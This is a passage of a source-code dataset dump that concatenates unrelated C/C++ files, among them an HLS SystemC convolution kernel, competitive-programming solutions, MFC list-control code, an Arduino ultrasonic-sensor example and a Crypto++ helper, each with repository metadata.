convolve_kernel::thread_tmp_mid1_fu_1010_p2() { tmp_mid1_fu_1010_p2 = (!j_cast5_mid2_cast_fu_949_p1.read().is_01() || !tmp_9_cast_mid1_fu_1006_p1.read().is_01())? sc_lv<6>(): (sc_biguint<6>(j_cast5_mid2_cast_fu_949_p1.read()) + sc_biguint<6>(tmp_9_cast_mid1_fu_1006_p1.read())); } void convolve_kernel::thread_tmp_s_fu_615_p2() { tmp_s_fu_615_p2 = (!j_cast5_fu_585_p1.read().is_01() || !tmp_9_cast_fu_611_p1.read().is_01())? sc_lv<6>(): (sc_biguint<6>(j_cast5_fu_585_p1.read()) + sc_biguint<6>(tmp_9_cast_fu_611_p1.read())); } void convolve_kernel::thread_to_b_1_fu_926_p2() { to_b_1_fu_926_p2 = (!ap_const_lv5_1.is_01() || !to_b_mid2_reg_2369.read().is_01())? sc_lv<5>(): (sc_biguint<5>(ap_const_lv5_1) + sc_biguint<5>(to_b_mid2_reg_2369.read())); } void convolve_kernel::thread_to_b_mid2_fu_783_p3() { to_b_mid2_fu_783_p3 = (!tmp_30_fu_778_p2.read()[0].is_01())? sc_lv<5>(): ((tmp_30_fu_778_p2.read()[0].to_bool())? ap_const_lv5_0: to_b_reg_555.read()); } void convolve_kernel::thread_to_b_phi_fu_559_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { to_b_phi_fu_559_p4 = to_b_1_reg_2463.read(); } else { to_b_phi_fu_559_p4 = to_b_reg_555.read(); } } void convolve_kernel::thread_ap_NS_fsm() { switch (ap_CS_fsm.read().to_uint64()) { case 1 : if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { ap_NS_fsm = ap_ST_fsm_pp0_stage0; } else { ap_NS_fsm = ap_ST_fsm_state1; } break; case 2 : if ((esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011011.read(), ap_const_boolean_0) && !(esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011011.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_fu_621_p2.read(), ap_const_lv1_1) && esl_seteq<1,1,1>(ap_enable_reg_pp0_iter1.read(), ap_const_logic_0)))) { ap_NS_fsm = ap_ST_fsm_pp0_stage1; } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011011.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_fu_621_p2.read(), ap_const_lv1_1) && esl_seteq<1,1,1>(ap_enable_reg_pp0_iter1.read(), ap_const_logic_0))) { ap_NS_fsm = ap_ST_fsm_state249; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage0; } break; case 4 : if (esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage2; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage1; } break; case 8 : if (esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage3; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage2; } break; case 16 : if (esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage4; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage3; } break; case 32 : if (esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage5; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage4; } break; case 64 : if (esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage6; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage5; } break; case 128 : if ((esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011011.read(), ap_const_boolean_0) && !(esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011011.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_enable_reg_pp0_iter14.read(), ap_const_logic_0)))) { ap_NS_fsm = ap_ST_fsm_pp0_stage7; } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011011.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_enable_reg_pp0_iter14.read(), ap_const_logic_0))) { ap_NS_fsm = ap_ST_fsm_state249; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage6; } break; case 256 : if (esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage8; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage7; } break; case 512 : if (esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage9; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage8; } break; case 1024 : if (esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage10; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage9; } break; case 2048 : if (esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage11; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage10; } break; case 4096 : if (esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage12; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage11; } break; case 8192 : if (esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage13; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage12; } break; case 16384 : if (esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage14; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage13; } break; case 32768 : if (esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage15; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage14; } break; case 65536 : if (esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0)) { ap_NS_fsm = ap_ST_fsm_pp0_stage0; } else { ap_NS_fsm = ap_ST_fsm_pp0_stage15; } break; case 131072 : ap_NS_fsm = ap_ST_fsm_state1; break; default : ap_NS_fsm = (sc_lv<18>) ("XXXXXXXXXXXXXXXXXX"); break; } } void convolve_kernel::thread_hdltv_gen() { const char* dump_tv = std::getenv("AP_WRITE_TV"); if (!(dump_tv && string(dump_tv) == "on")) return; wait(); mHdltvinHandle << "[ " << endl; mHdltvoutHandle << "[ " << endl; int ap_cycleNo = 0; while (1) { wait(); const char* mComma = ap_cycleNo == 0 ? " " : ", " ; mHdltvinHandle << mComma << "{" << " \"ap_rst_n\" : \"" << ap_rst_n.read() << "\" "; mHdltvoutHandle << mComma << "{" << " \"bufw_Addr_A\" : \"" << bufw_Addr_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufw_EN_A\" : \"" << bufw_EN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufw_WEN_A\" : \"" << bufw_WEN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufw_Din_A\" : \"" << bufw_Din_A.read() << "\" "; mHdltvinHandle << " , " << " \"bufw_Dout_A\" : \"" << bufw_Dout_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufw_Clk_A\" : \"" << bufw_Clk_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufw_Rst_A\" : \"" << bufw_Rst_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_Addr_A\" : \"" << bufi_Addr_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_EN_A\" : \"" << bufi_EN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_WEN_A\" : \"" << bufi_WEN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_Din_A\" : \"" << bufi_Din_A.read() << "\" "; mHdltvinHandle << " , " << " \"bufi_Dout_A\" : \"" << bufi_Dout_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_Clk_A\" : \"" << bufi_Clk_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufi_Rst_A\" : \"" << bufi_Rst_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_Addr_A\" : \"" << bufo_Addr_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_EN_A\" : \"" << bufo_EN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_WEN_A\" : \"" << bufo_WEN_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_Din_A\" : \"" << bufo_Din_A.read() << "\" "; mHdltvinHandle << " , " << " \"bufo_Dout_A\" : \"" << bufo_Dout_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_Clk_A\" : \"" << bufo_Clk_A.read() << "\" "; mHdltvoutHandle << " , " << " \"bufo_Rst_A\" : \"" << bufo_Rst_A.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_AWVALID\" : \"" << s_axi_control_AWVALID.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_AWREADY\" : \"" << s_axi_control_AWREADY.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_AWADDR\" : \"" << s_axi_control_AWADDR.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_WVALID\" : \"" << s_axi_control_WVALID.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_WREADY\" : \"" << s_axi_control_WREADY.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_WDATA\" : \"" << s_axi_control_WDATA.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_WSTRB\" : \"" << s_axi_control_WSTRB.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_ARVALID\" : \"" << s_axi_control_ARVALID.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_ARREADY\" : \"" << s_axi_control_ARREADY.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_ARADDR\" : \"" << s_axi_control_ARADDR.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_RVALID\" : \"" << s_axi_control_RVALID.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_RREADY\" : \"" << s_axi_control_RREADY.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_RDATA\" : \"" << s_axi_control_RDATA.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_RRESP\" : \"" << s_axi_control_RRESP.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_BVALID\" : \"" << s_axi_control_BVALID.read() << "\" "; mHdltvinHandle << " , " << " \"s_axi_control_BREADY\" : \"" << s_axi_control_BREADY.read() << "\" "; mHdltvoutHandle << " , " << " \"s_axi_control_BRESP\" : \"" << s_axi_control_BRESP.read() << "\" "; mHdltvoutHandle << " , " << " \"interrupt\" : \"" << interrupt.read() << "\" "; mHdltvinHandle << "}" << std::endl; mHdltvoutHandle << "}" << std::endl; ap_cycleNo++; } } }
3c9e1457eca58431e712b26ab45d1c72a937e2ae
ba1944305bd4641be09c90f4464475901845077a
/1leetcode/week_4_day_1.cpp
99fcb25b59d8a28efbbff541e8ebc596dba6148c
[]
no_license
Ravi-Khatri/code
e5c9bb0d88a5ea74ac2b0dfae83b90944b69ce0b
be40c85ec888059457b2189829f329268cd036b5
refs/heads/main
2023-04-03T18:38:54.289012
2021-04-18T08:05:20
2021-04-18T08:05:20
256,105,251
0
1
null
null
null
null
UTF-8
C++
false
false
583
cpp
#include<bits/stdc++.h> #include<vector> #include<iostream> using namespace std; int findi(vector<int> arr,int k) { int n=arr.size(); int start=0,end=0,res=0; int sum=arr[0]; while(start<n && end<n) { if(sum<k) { ++end; sum+=arr[end]; } else if(sum>k) { sum-=arr[start]; start++; } else if(start<end) res+=end-start,sum-=arr[start],++start; } return res; } void solve() { int n,k;cin>>n>>k; vector<int> arr(n); for(int i=0;i<n;i++) cin>>arr[i]; int ans=findi(arr,k); cout<<ans<<"\n"; } int main() { int t;cin>>t; while(t--) solve(); }
962a9e5ec9484c9a89740600c3807447773864d5
2896fa8c8fa20081c8b5da47e024cf0f15ee9e06
/src/mfc/afxlistctrl.cpp
4102b1cb3a88a487e10f5e2bd64727084be1fdc1
[]
no_license
adzm/atlmfc
f2b7f1f0200df07a000cea31f62b146fb094b253
ea3ab8e4dee965905ae14f34d04b44ad1027827b
refs/heads/master
2021-05-17T02:41:49.896685
2020-03-27T16:30:55
2020-03-27T16:30:55
250,580,780
10
1
null
null
null
null
UTF-8
C++
false
false
6,092
cpp
// This is a part of the Microsoft Foundation Classes C++ library. // Copyright (C) Microsoft Corporation // All rights reserved. // // This source code is only intended as a supplement to the // Microsoft Foundation Classes Reference and related // electronic documentation provided with the library. // See these sources for detailed information regarding the // Microsoft Foundation Classes product. #include "stdafx.h" #include "afxlistctrl.h" #include "afxdrawmanager.h" #ifdef _DEBUG #define new DEBUG_NEW #endif ///////////////////////////////////////////////////////////////////////////// // CMFCListCtrl IMPLEMENT_DYNAMIC(CMFCListCtrl, CListCtrl) CMFCListCtrl::CMFCListCtrl() { m_iSortedColumn = -1; m_bAscending = TRUE; m_bMarkSortedColumn = FALSE; m_clrSortedColumn = (COLORREF)-1; m_hOldFont = NULL; } CMFCListCtrl::~CMFCListCtrl() { } BEGIN_MESSAGE_MAP(CMFCListCtrl, CListCtrl) ON_WM_CREATE() ON_WM_ERASEBKGND() ON_WM_SYSCOLORCHANGE() ON_WM_SIZE() ON_WM_STYLECHANGED() ON_NOTIFY_REFLECT(NM_CUSTOMDRAW, &CMFCListCtrl::OnCustomDraw) ON_NOTIFY_REFLECT(LVN_COLUMNCLICK, &CMFCListCtrl::OnColumnClick) END_MESSAGE_MAP() ///////////////////////////////////////////////////////////////////////////// // CMFCListCtrl message handlers BOOL CMFCListCtrl::InitList() { InitHeader(); InitColors(); return TRUE; } void CMFCListCtrl::InitHeader() { // Initialize header control: GetHeaderCtrl().SubclassDlgItem(0, this); } void CMFCListCtrl::PreSubclassWindow() { CListCtrl::PreSubclassWindow(); _AFX_THREAD_STATE* pThreadState = AfxGetThreadState(); if (pThreadState->m_pWndInit == NULL) { if (!InitList()) { ASSERT(FALSE); } } } int CMFCListCtrl::OnCreate(LPCREATESTRUCT lpCreateStruct) { if (CListCtrl::OnCreate(lpCreateStruct) == -1) return -1; if (!InitList()) { return -1; } return 0; } void CMFCListCtrl::OnColumnClick(NMHDR* pNMHDR, LRESULT* pResult) { NM_LISTVIEW* pNMListView = (NM_LISTVIEW*)pNMHDR; ENSURE(pNMListView != NULL); int iColumn = pNMListView->iSubItem; BOOL bShiftIsPressed = (::GetAsyncKeyState(VK_SHIFT) & 0x8000); int nColumnState = GetHeaderCtrl().GetColumnState(iColumn); BOOL bAscending = TRUE; if (nColumnState != 0) { bAscending = nColumnState <= 0; } Sort(iColumn, bAscending, bShiftIsPressed && IsMultipleSort()); *pResult = 0; } void CMFCListCtrl::Sort(int iColumn, BOOL bAscending, BOOL bAdd) { CWaitCursor wait; GetHeaderCtrl().SetSortColumn(iColumn, bAscending, bAdd); m_iSortedColumn = iColumn; m_bAscending = bAscending; SortItems(CompareProc, (LPARAM) this); } void CMFCListCtrl::SetSortColumn(int iColumn, BOOL bAscending, BOOL bAdd) { GetHeaderCtrl().SetSortColumn(iColumn, bAscending, bAdd); } void CMFCListCtrl::RemoveSortColumn(int iColumn) { GetHeaderCtrl().RemoveSortColumn(iColumn); } void CMFCListCtrl::EnableMultipleSort(BOOL bEnable) { GetHeaderCtrl().EnableMultipleSort(bEnable); } BOOL CMFCListCtrl::IsMultipleSort() const { return((CMFCListCtrl*) this)->GetHeaderCtrl().IsMultipleSort(); } int CMFCListCtrl::OnCompareItems(LPARAM /*lParam1*/, LPARAM /*lParam2*/, int /*iColumn*/) { return 0; } int CALLBACK CMFCListCtrl::CompareProc(LPARAM lParam1, LPARAM lParam2, LPARAM lParamSort) { CMFCListCtrl* pList = (CMFCListCtrl*) lParamSort; ASSERT_VALID(pList); int nRes = pList->OnCompareItems(lParam1, lParam2, pList->m_iSortedColumn); nRes = pList->m_bAscending ? nRes : -nRes; return nRes; } void CMFCListCtrl::OnCustomDraw(NMHDR* pNMHDR, LRESULT* pResult) { ENSURE(pNMHDR != NULL); LPNMLVCUSTOMDRAW lplvcd = (LPNMLVCUSTOMDRAW)pNMHDR; switch (lplvcd->nmcd.dwDrawStage) { case CDDS_PREPAINT: *pResult = CDRF_NOTIFYITEMDRAW; break; case CDDS_ITEMPREPAINT: *pResult = CDRF_NOTIFYSUBITEMDRAW; break; case CDDS_ITEMPREPAINT | CDDS_SUBITEM: { int iColumn = lplvcd->iSubItem; int iRow = (int) lplvcd->nmcd.dwItemSpec; lplvcd->clrTextBk = OnGetCellBkColor(iRow, iColumn); lplvcd->clrText = OnGetCellTextColor(iRow, iColumn); if (iColumn == m_iSortedColumn && m_bMarkSortedColumn && lplvcd->clrTextBk == GetBkColor()) { lplvcd->clrTextBk = m_clrSortedColumn; } HFONT hFont = OnGetCellFont( iRow, iColumn, (DWORD) lplvcd->nmcd.lItemlParam); if (hFont != NULL) { m_hOldFont = (HFONT) SelectObject(lplvcd->nmcd.hdc, hFont); ENSURE(m_hOldFont != NULL); *pResult = CDRF_NEWFONT | CDRF_NOTIFYPOSTPAINT; } else { *pResult = CDRF_DODEFAULT; } } break; case CDDS_ITEMPOSTPAINT | CDDS_SUBITEM: if (m_hOldFont != NULL) { SelectObject(lplvcd->nmcd.hdc, m_hOldFont); m_hOldFont = NULL; } *pResult = CDRF_DODEFAULT; break; } } void CMFCListCtrl::EnableMarkSortedColumn(BOOL bMark/* = TRUE*/, BOOL bRedraw/* = TRUE */) { m_bMarkSortedColumn = bMark; if (GetSafeHwnd() != NULL && bRedraw) { RedrawWindow(); } } BOOL CMFCListCtrl::OnEraseBkgnd(CDC* pDC) { BOOL bRes = CListCtrl::OnEraseBkgnd(pDC); if (m_iSortedColumn >= 0 && m_bMarkSortedColumn) { CRect rectClient; GetClientRect(&rectClient); CRect rectHeader; GetHeaderCtrl().GetItemRect(m_iSortedColumn, &rectHeader); GetHeaderCtrl().MapWindowPoints(this, rectHeader); CRect rectColumn = rectClient; rectColumn.left = rectHeader.left; rectColumn.right = rectHeader.right; CBrush br(m_clrSortedColumn); pDC->FillRect(rectColumn, &br); } return bRes; } void CMFCListCtrl::OnSysColorChange() { CListCtrl::OnSysColorChange(); InitColors(); RedrawWindow(); } void CMFCListCtrl::InitColors() { m_clrSortedColumn = CDrawingManager::PixelAlpha(GetBkColor(), .97, .97, .97); } void CMFCListCtrl::OnStyleChanged(int nStyleType, LPSTYLESTRUCT lpStyleStruct) { CListCtrl::OnStyleChanged(nStyleType, lpStyleStruct); if ((lpStyleStruct->styleNew & LVS_REPORT) && (lpStyleStruct->styleOld & LVS_REPORT) == 0) { if (GetHeaderCtrl().GetSafeHwnd() == NULL) { InitHeader(); } } } void CMFCListCtrl::OnSize(UINT nType, int cx, int cy) { CListCtrl::OnSize(nType, cx, cy); if (GetHeaderCtrl().GetSafeHwnd() != NULL) { GetHeaderCtrl().RedrawWindow(); } }
50c5ae51ae4986fd97808fc6db0ea86f6f6ec8b9
2607fedbbd40dd43edff03d4f4d00d8acd50d7c0
/examples/ultrasonic.ino
181af153dcef4c2fc165ad229fe2a423bbfc4ecf
[]
no_license
UMD-ENEE408I/ENEE408I_Spring_2021_Team_4
1043b05657db3be49f8ad40aa6605615dc6e10b5
9e28507283d6ec2eb49ed07a7fcbbf05280db4e3
refs/heads/main
2023-04-25T02:00:19.590473
2021-05-11T16:42:41
2021-05-11T16:42:41
333,126,549
2
1
null
null
null
null
UTF-8
C++
false
false
1,093
ino
// Demonstrates ultrasonic ping sensor trio functionality const int echoL = 2; const int trigL = 3; const int echoM = 4; const int trigM = 5; const int echoR = 6; const int trigR = 7; const int pulseLen = 60; // microseconds float distL, distM, distR; void setup() { pinMode(echoL, INPUT); pinMode(echoM, INPUT); pinMode(echoR, INPUT); pinMode(trigL, OUTPUT); pinMode(trigM, OUTPUT); pinMode(trigR, OUTPUT); Serial.begin(9600); } void loop() { distL = getPing(echoL, trigL); distM = getPing(echoM, trigM); distR = getPing(echoR, trigR); Serial.print("left:"); Serial.print(distL); Serial.print(" mid:"); Serial.print(distM); Serial.print(" right:"); Serial.println(distR); delay(1000); } // returns ping distance in cm float getPing(int echoPin, int trigPin){ digitalWrite(trigPin, HIGH); delayMicroseconds(pulseLen); digitalWrite(trigPin, LOW); return 0.017 * pulseIn(echoPin, (HIGH)); // read high pulse length // round trip time * 0.034cm/microsec / 2 }
ab2e0e4674ccda7a8d004b69e26a9c65faae76cd
84ff9d3de0cb8041e5f7e0e4826704ac89a6b1f5
/src/what_colour.cc
8745b0f10139bef6f36bd5eecd82dcbd46bb9820
[]
no_license
trmrsh/cpp-subs
927c1f969a1021a9446b06b6882df0faf450bbb3
af93d2c33b5ee797535c790844586c12a9a41f2a
refs/heads/master
2021-05-02T07:57:16.293461
2019-01-11T22:49:01
2019-01-11T22:49:01
11,352,292
0
0
null
null
null
null
UTF-8
C++
false
false
1,583
cc
#include <string> #include "trm/subs.h" /** Translates a string such as "red" or "black" into an equivalent * enum that can be used to set the colours in the PGPLOT routine * cpgsci. Recognised colours are: black, white, red, green, blue, * cyan, purple, yellow, orange, light_green dark_green, light_blue, * dark_blue, light_grey, pink & none for no plot */ Subs::PLOT_COLOUR Subs::what_colour(const std::string& colour){ if(toupper(colour) == "NONE"){ return NONE; }else if(toupper(colour) == "BLACK"){ return BLACK; }else if(toupper(colour) == "WHITE"){ return WHITE; }else if(toupper(colour) == "RED"){ return RED; }else if(toupper(colour) == "GREEN"){ return GREEN; }else if(toupper(colour) == "BLUE"){ return BLUE; }else if(toupper(colour) == "CYAN"){ return CYAN; }else if(toupper(colour) == "PURPLE"){ return PURPLE; }else if(toupper(colour) == "YELLOW"){ return YELLOW; }else if(toupper(colour) == "ORANGE"){ return ORANGE; }else if(toupper(colour) == "LIGHT_GREEN"){ return LIGHT_GREEN; }else if(toupper(colour) == "DARK_GREEN"){ return DARK_GREEN; }else if(toupper(colour) == "LIGHT_BLUE"){ return LIGHT_BLUE; }else if(toupper(colour) == "DARK_BLUE"){ return DARK_BLUE; }else if(toupper(colour) == "DARK_GREY"){ return DARK_GREY; }else if(toupper(colour) == "LIGHT_GREY"){ return LIGHT_GREY; }else if(toupper(colour) == "PINK"){ return PINK; }else{ throw Subs_Error("Subs::what_colour(const std::string&): colour = " + colour + " not recognised."); } }
f2f5a177767c063a0df5620eb5173bbae1c560c4
0b42d70ff69fe635da5329c1e6d24422a9c189fc
/codeforces/edu_71_div2/road.cpp
a2fe234e4ed6cf442b2158c03f2e97ca5d4ce809
[]
no_license
dvkcool/competitive
93424318d6712ee9e73f7329b5bd81c3c547729b
dbfa16ee63b9464ae28763af808911c5bfcd578b
refs/heads/master
2021-06-03T21:44:09.353977
2020-10-20T16:43:03
2020-10-20T16:43:03
150,016,131
4
3
null
null
null
null
UTF-8
C++
false
false
1,537
cpp
#include<iostream> #include<algorithm> #define lli long long int using namespace std; void solve(){ int n; lli a, b; cin>>n>>a>>b; string s; cin>>s; lli cost = b; int h = 1; int e = 0; for(int i=0; i<n; i++){ if(s[i]=='0'){ e++; } } for(int i=0; i<n-1; i++){ if(s[i+1]=='0'){ if(s[i]=='1'){ cost = cost + a + (2*b); //cout<<"this: "<<cost<<endl; if(i+1==n-1){ continue; } if(a<b){ h = 1; cost = cost + (2*a) + b; } else{ h = 2; cost = cost + a + (2 * b); } //cout<<"this: "<<cost<<endl; i++; //cout<<h<<" "<<cost<<endl; continue; } if(i==0 && i+1==n-1){ cost = cost + a + b; continue; } //hi if(h==1){ cost = cost + a + b; } else{ if(a<b){ h = 1; cost = cost + (2*a) + b; } else{ h = 2; cost = cost + a + (2 * b); } } } else{ if(h==1){ h = 2; cost = cost + (2*a) + (2*b); } else{ cost = cost + a + (2*b); } } //cout<<h<<" "<<cost<<endl; } //cout<<e<<endl; if(h==2){ cost = cost + (2*a) + b; } else{ cost = cost + a + b; } if(e==n){ cost = cost - a - b; } cout<<cost<<endl; } int main() { ios_base::sync_with_stdio(false); cin.tie(0); int t; cin>>t; while(t>0){ t--; solve(); } return 0; }
89bbcba6d905d0794ef9eb9214999ac08c741c94
0b72ad0c7060ffb5672e05392d145d95662febab
/Tech/crypto51/simple.cpp
ee5ab0cbdeecd38eb1bd5ed1e5a167b499a7f540
[ "LicenseRef-scancode-public-domain", "LicenseRef-scancode-cryptopp", "LicenseRef-scancode-unknown-license-reference" ]
permissive
xfxf123444/japan
d55912cff16fd63caab0e5b206f1a3fcd66aea5e
29e5f9cab5f431417cb1cf435477adeb6a5f8b31
refs/heads/master
2021-01-10T01:17:25.067789
2015-12-20T09:06:13
2015-12-20T09:06:13
43,422,127
4
0
null
null
null
null
UTF-8
C++
false
false
519
cpp
// simple.cpp - written and placed in the public domain by Wei Dai #include "pch.h" #include "simple.h" #include "secblock.h" NAMESPACE_BEGIN(CryptoPP) void HashTransformationWithDefaultTruncation::TruncatedFinal(byte *digest, unsigned int digestSize) { ThrowIfInvalidTruncatedSize(digestSize); unsigned int fullDigestSize = DigestSize(); if (digestSize == fullDigestSize) Final(digest); else { SecByteBlock buffer(fullDigestSize); Final(buffer); memcpy(digest, buffer, digestSize); } } NAMESPACE_END
767673a9fc91ee7f8eead4132be91f8b3dab3bc6
f0bd42c8ae869dee511f6d41b1bc255cb32887d5
/Codeforces/385A - Bear and Raspberry.cpp
5f0434ddb622b17d493a454a35ee0f0f86eafa24
[]
no_license
osamahatem/CompetitiveProgramming
3c68218a181d4637c09f31a7097c62f20977ffcd
a5b54ae8cab47b2720a64c68832a9c07668c5ffb
refs/heads/master
2021-06-10T10:21:13.879053
2020-07-07T14:59:44
2020-07-07T14:59:44
113,673,720
3
1
null
null
null
null
UTF-8
C++
false
false
258
cpp
#include<cstdio> #include<algorithm> using namespace std; int main(){ int i,n,c,last,x,ans=0; scanf("%d%d%d",&n,&c,&last); for(i=1;i<n;i++){ scanf("%d",&x); ans=max(ans,last-x-c); last=x; } printf("%d\n",ans); }
21e07661187e55f185b2e0a71da3aab464db31f4
6dd82b73fd87620a1d9c410c05e34d81578d345e
/include/fdeep/fdeep.hpp
82f1d38ea70800a50e213d442e5eff164cc16552
[ "MIT" ]
permissive
lyk125/frugally-deep
364364da3d45ef81c599b1715c24efc0349ce5e1
511a8b557ba867a1f92ee4e3eff394cafe1c0f1a
refs/heads/master
2021-08-16T07:55:18.100726
2017-11-19T10:28:04
2017-11-19T10:28:04
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,917
hpp
// Copyright 2016, Tobias Hermann. // https://github.com/Dobiasd/frugally-deep // Distributed under the MIT License. // (See accompanying LICENSE file or at // https://opensource.org/licenses/MIT) #pragma once #include "fdeep/common.hpp" #include "fdeep/convolution.hpp" #include "fdeep/filter.hpp" #include "fdeep/tensor2.hpp" #include "fdeep/tensor2_pos.hpp" #include "fdeep/tensor3.hpp" #include "fdeep/tensor3_pos.hpp" #include "fdeep/node.hpp" #include "fdeep/shape2.hpp" #include "fdeep/shape3.hpp" #include "fdeep/layers/add_layer.hpp" #include "fdeep/layers/average_pooling_2d_layer.hpp" #include "fdeep/layers/batch_normalization_layer.hpp" #include "fdeep/layers/concatenate_layer.hpp" #include "fdeep/layers/conv_2d_layer.hpp" #include "fdeep/layers/conv_2d_transpose_layer.hpp" #include "fdeep/layers/cropping_2d_layer.hpp" #include "fdeep/layers/dense_layer.hpp" #include "fdeep/layers/elu_layer.hpp" #include "fdeep/layers/flatten_layer.hpp" #include "fdeep/layers/global_average_pooling_2d_layer.hpp" #include "fdeep/layers/global_max_pooling_2d_layer.hpp" #include "fdeep/layers/hard_sigmoid_layer.hpp" #include "fdeep/layers/linear_layer.hpp" #include "fdeep/layers/input_layer.hpp" #include "fdeep/layers/layer.hpp" #include "fdeep/layers/leaky_relu_layer.hpp" #include "fdeep/layers/max_pooling_2d_layer.hpp" #include "fdeep/layers/model_layer.hpp" #include "fdeep/layers/pooling_2d_layer.hpp" #include "fdeep/layers/relu_layer.hpp" #include "fdeep/layers/separable_conv_2d_layer.hpp" #include "fdeep/layers/selu_layer.hpp" #include "fdeep/layers/sigmoid_layer.hpp" #include "fdeep/layers/softmax_layer.hpp" #include 